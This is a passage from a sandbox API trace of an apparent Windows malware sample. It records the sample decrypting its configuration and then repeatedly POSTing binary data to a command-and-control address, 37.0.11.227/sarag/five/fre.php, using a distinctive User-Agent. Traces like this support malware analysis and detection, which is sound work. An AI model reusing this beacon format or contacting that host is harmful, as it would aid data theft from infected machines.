(lpLibFileName="shlwapi") returned 0x76ed0000 [0191.410] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0191.410] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0191.411] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0191.411] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0191.411] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0191.412] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0191.412] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0191.412] GetProcessHeap () returned 0x690000 [0191.412] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0191.412] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0191.413] GetProcessHeap () returned 0x690000 [0191.413] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0191.413] GetProcessHeap () returned 0x690000 [0191.414] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0191.414] GetProcessHeap () returned 0x690000 [0191.414] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0191.414] GetProcessHeap () returned 0x690000 [0191.414] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0191.415] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.416] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0191.425] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.425] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0191.431] GetProcessHeap () returned 0x690000 [0191.431] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0191.432] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.432] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0191.435] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.435] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0191.436] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.436] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0191.436] GetProcessHeap () returned 0x690000 [0191.436] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0191.437] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.437] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0191.438] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.438] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0191.439] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.439] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0191.439] GetProcessHeap () returned 0x690000 [0191.439] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0191.440] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0191.440] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0191.441] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0191.441] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0191.441] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0191.442] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0191.442] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0191.443] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0191.443] GetProcessHeap () returned 0x690000 [0191.443] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0191.443] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b2ec0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae850*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0191.443] GetProcessHeap () returned 0x690000 [0191.443] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3f0 [0191.443] socket (af=2, type=1, protocol=6) returned 0x39c [0191.443] connect (s=0x39c, name=0x6ae850*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0191.473] FreeAddrInfoW (pAddrInfo=0x6b2ec0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae850*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0191.473] GetProcessHeap () returned 0x690000 [0191.473] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0191.473] GetProcessHeap () returned 0x690000 [0191.473] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b2fb8 [0191.474] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0191.475] wvsprintfA (in: param_1=0x6b2fb8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0191.475] GetProcessHeap () returned 0x690000 [0191.475] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af980 [0191.475] GetProcessHeap () returned 0x690000 [0191.475] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0191.475] GetProcessHeap () returned 0x690000 [0191.475] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0191.475] GetProcessHeap () returned 0x690000 [0191.475] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b2fb8 [0191.476] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0191.477] wvsprintfA (in: param_1=0x6b2fb8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0191.477] GetProcessHeap () returned 0x690000 [0191.477] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0191.477] GetProcessHeap () returned 0x690000 [0191.477] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0191.478] send (s=0x39c, buf=0x6abd08*, len=242, flags=0) returned 242 [0191.478] send (s=0x39c, buf=0x6aba40*, len=159, flags=0) returned 159 [0191.478] GetProcessHeap () returned 0x690000 [0191.478] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0191.478] recv (in: s=0x39c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0191.560] GetProcessHeap () returned 0x690000 [0191.560] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0191.561] GetProcessHeap () returned 0x690000 [0191.561] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0191.562] GetProcessHeap () returned 0x690000 [0191.562] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af980 | out: hHeap=0x690000) returned 1 [0191.562] GetProcessHeap () returned 0x690000 [0191.563] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0191.563] closesocket (s=0x39c) returned 0 [0191.563] GetProcessHeap () returned 0x690000 [0191.563] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3f0 | out: hHeap=0x690000) returned 1 [0191.563] GetProcessHeap () returned 0x690000 [0191.564] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0191.564] GetProcessHeap () returned 0x690000 [0191.564] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0191.564] GetProcessHeap () returned 0x690000 [0191.565] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0191.565] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x390) returned 0x39c [0191.567] Sleep (dwMilliseconds=0xea60) [0191.569] GetProcessHeap () returned 0x690000 [0191.569] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0191.570] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.570] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0191.579] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.580] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0191.590] GetProcessHeap () returned 0x690000 [0191.590] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0191.591] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.592] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0191.592] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.593] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0191.593] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.594] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0191.594] GetProcessHeap () returned 0x690000 [0191.594] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0191.595] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.596] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0191.606] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.607] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0191.607] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.608] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0191.608] GetProcessHeap () returned 0x690000 [0191.608] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0191.609] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0191.609] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0191.610] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0191.610] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0191.611] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0191.611] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0191.612] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0191.612] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0191.613] GetProcessHeap () returned 0x690000 [0191.613] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0191.613] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0191.613] GetProcessHeap () returned 0x690000 [0191.614] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0191.614] GetProcessHeap () returned 0x690000 [0191.616] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0191.616] GetProcessHeap () returned 0x690000 [0191.617] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0191.617] GetProcessHeap () returned 0x690000 [0191.617] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0191.618] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.618] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0191.624] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.625] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0191.634] GetProcessHeap () returned 0x690000 [0191.634] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0191.634] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.635] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0191.635] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.636] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0191.636] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.637] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0191.637] GetProcessHeap () returned 0x690000 [0191.638] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0191.638] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.639] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0191.640] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.640] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0191.641] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.641] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0191.641] GetProcessHeap () returned 0x690000 [0191.641] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0191.642] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0191.642] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0191.643] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0191.644] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0191.644] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0191.645] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0191.645] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0191.646] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0191.646] GetProcessHeap () returned 0x690000 [0191.646] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0191.646] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b2858*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae940*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0191.646] GetProcessHeap () returned 0x690000 [0191.646] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4f0 [0191.646] socket (af=2, type=1, protocol=6) returned 0x3a0 [0191.646] connect (s=0x3a0, name=0x6ae940*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0191.673] FreeAddrInfoW (pAddrInfo=0x6b2858*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae940*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0191.673] GetProcessHeap () returned 0x690000 [0191.673] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0191.673] GetProcessHeap () returned 0x690000 [0191.673] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b2fb8 [0191.674] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0191.675] wvsprintfA (in: param_1=0x6b2fb8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0191.675] GetProcessHeap () returned 0x690000 [0191.675] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0340 [0191.675] GetProcessHeap () returned 0x690000 [0191.676] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0191.676] GetProcessHeap () returned 0x690000 [0191.676] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0191.676] GetProcessHeap () returned 0x690000 [0191.676] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b2fb8 [0191.677] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0191.678] wvsprintfA (in: param_1=0x6b2fb8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0191.678] GetProcessHeap () returned 0x690000 [0191.678] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0191.678] GetProcessHeap () returned 0x690000 [0191.679] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0191.679] send (s=0x3a0, buf=0x6abd08*, len=242, flags=0) returned 242 [0191.679] send (s=0x3a0, buf=0x6aba40*, len=159, flags=0) returned 159 [0191.679] GetProcessHeap () returned 0x690000 [0191.679] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0191.679] recv (in: s=0x3a0, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0191.779] GetProcessHeap () returned 0x690000 [0191.779] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0191.780] GetProcessHeap () returned 0x690000 [0191.780] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0191.780] GetProcessHeap () returned 0x690000 [0191.780] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0340 | out: hHeap=0x690000) returned 1 [0191.780] GetProcessHeap () returned 0x690000 [0191.780] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0191.780] closesocket (s=0x3a0) returned 0 [0191.781] GetProcessHeap () returned 0x690000 [0191.781] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4f0 | out: hHeap=0x690000) returned 1 [0191.781] GetProcessHeap () returned 0x690000 [0191.781] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0191.781] GetProcessHeap () returned 0x690000 [0191.782] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0191.782] GetProcessHeap () returned 0x690000 [0191.782] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0191.796] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x12d0) returned 0x3a0 [0191.798] Sleep (dwMilliseconds=0xea60) [0191.803] GetProcessHeap () returned 0x690000 [0191.803] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0191.807] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.808] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0191.826] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.828] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0191.835] GetProcessHeap () returned 0x690000 [0191.835] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0191.836] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.836] CryptImportKey (in: hProv=0x6af100, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0191.838] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.839] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0191.839] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.840] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0191.840] GetProcessHeap () returned 0x690000 [0191.840] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0191.855] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.856] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0191.857] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.857] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0191.860] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0191.860] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0191.860] GetProcessHeap () returned 0x690000 [0191.860] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0191.861] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0191.861] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0191.861] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0191.862] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0191.862] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0191.862] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0191.863] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0191.863] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0191.863] GetProcessHeap () returned 0x690000 [0191.863] RtlAllocateHeap 